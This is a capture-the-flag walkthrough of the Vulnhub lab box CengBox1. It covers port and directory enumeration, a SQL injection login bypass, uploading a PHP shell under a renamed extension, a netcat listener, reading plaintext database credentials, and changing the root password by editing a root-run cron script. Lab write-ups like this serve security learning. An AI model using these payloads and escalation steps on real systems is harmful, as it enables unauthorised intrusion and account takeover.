Vulnhub - CengBox1

Hi all, that was a really easy box.

You can find the machine there > CengBox1

Enumeration/Reconnaissance

Let’s start always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ip=192.168.1.2
$ nmap -sC -sV -p- -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-03 15:28 EEST
Nmap scan report for cengbox.zte.com.cn (192.168.1.2)
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:cc:28:f3:8c:f5:0e:3f:5a:ed:13:f3:ad:53:13:9b (RSA)
|   256 f7:3a:a3:ff:a1:f7:e5:1b:1e:6f:58:5f:c7:02:55:9b (ECDSA)
|_  256 f0:dd:2e:1d:3d:0a:e8:c1:5f:52:7c:55:2c:dc:1e:ef (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: CEng Company
MAC Address: 08:00:27:73:EB:42 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s run gobuster on it!

1
2
3
4
5
6
7
8
9
10
$ gobuster dir -q -u http://$ip/ -w /root/Documents/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -x php,txt,html -o gobuster.txt
/js (Status: 301)
/css (Status: 301)
/img (Status: 301)
/uploads (Status: 301)
/index.php (Status: 200)
/vendor (Status: 301)
/server-status (Status: 403)
/masteradmin (Status: 301)
/index.php (Status: 200)

So the interesting directories are :

1
2
/uploads
/masteradmin

But all of them give Forbidden, let’s run gobuster inside /masteradmin for further enumeration.

1
2
3
4
5
6
7
8
9
$ gobuster dir -q -u http://$ip/masteradmin/ -w /root/Documents/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -x php,txt,html -o gobuster2.txt
/images (Status: 301)
/js (Status: 301)
/css (Status: 301)
/login.php (Status: 200)
/upload.php (Status: 200)
/db.php (Status: 200)
/fonts (Status: 301)
/vendor (Status: 301)

SQL Injection Authentication Bypass - Shell as www-data

Here we go /login.php asks for credentials :

I tried the classic ones admin:admin or guest:guest but nothing, so i decided to exploit this manually without using sqlmap.

The source code will be something like :

1
2
3
$username=$_POST['username'];
$password=$_POST['password'];
$query="select username,pass from users where username='$username' and password='$password' limit 0,1";

So here takes the user input and put it into the SQL query. So here we can see the query is quoting the input with single quote, that means we have to use a single quote to close the first quote and then inject our payload.

Like :

1
2
username : ' or 1=1--
password : ' or 1=1--

And we’re in! :D We can see this upload form :

Let’s try to create a simple php script to see if we can execute php code.

1
2
3
4
$ cat test.php 
<?php
echo "hellooooo";
?>

When we upload it we can see this error -> extension not allowed, please choose a CENG file. Alright, let’s rename our test.php to test.CENG.

Now it says : Success & we can find the file under /uploads/test.CENG

Now let’s simply upload our shell as CENG file :)

We have shell, i’ll show you some tricks for fully interactive reverse shell.

1
2
3
4
5
6
7
8
$ nc -lvp 6666
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@cengbox:/$ ^Z (ctrl + z)
[1]+  Stopped                 nc -lvp 6666
$ stty raw -echo
$ fg
www-data@cengbox:/$ export TERM=xterm
www-data@cengbox:/$

www-data -> cengover

Now we can see this inside db.php :

1
2
3
4
5
www-data@cengbox:/var/www/html/masteradmin$ cat db.php
<?php
$serverName = "localhost";
$username = "root";
$password = "SuperS3cR3TPassw0rd1!";

Let’s connect to mysql and search for credentials.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
www-data@cengbox:/var/www/html/masteradmin$ mysql -u root -p
Enter password: 

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| cengbox            |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.01 sec)

mysql> use cengbox;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_cengbox |
+-------------------+
| admin             |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from admin;
+----+-------------+---------------+
| id | username    | password      |
+----+-------------+---------------+
|  1 | masteradmin | C3ng0v3R00T1! |
+----+-------------+---------------+
1 row in set (0.00 sec)

mysql> exit;

Great, let’s use this password with the system user cengover :

1
2
3
4
www-data@cengbox:/var/www/html/masteradmin$ su - cengover
Password: 
cengover@cengbox:~$ whoami
cengover

cengover -> root

Perfect, now we need to transfer pspy to detect a cronjob.

1
2
3
cengover@cengbox:~$ cd /tmp
cengover@cengbox:/tmp$ wget -q $ip/pspy64; chmod +x pspy64
cengover@cengbox:/tmp$ ./pspy64 -p -i 1000

This file runs as root :

1
2020/07/03 16:20:01 CMD: UID=0    PID=1661   | /bin/sh -c /usr/bin/python3 /opt/md5check.py 

I discovered a new trick, instead of using a reverse shell or something we can simply change root password. Add this :

1
2
import os
os.system("echo 'root:pwned' | sudo chpasswd")

And now we can login in as root :

1
2
3
cengover@cengbox:/opt$ su - root
Password: 
root@cengbox:~# 

Let’s read the flag :

1
2
3
4
5
6
7
8
9
10
11
12
13
root@cengbox:~# cat /root/root.txt
 / ____|  ____|           |  _ \           
| |    | |__   _ __   __ _| |_) | _____  __
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ /
| |____| |____| | | | (_| | |_) | (_) >  < 
 \_____|______|_| |_|\__, |____/ \___/_/\_\
                      __/ |                
                     |___/                 

Congrats. Hope you enjoyed it and you can contact me on Twitter @arslanblcn_

a51e522b22a439b8e1b22d84f71cf0f2
root@cengbox:~# 

Fun box :)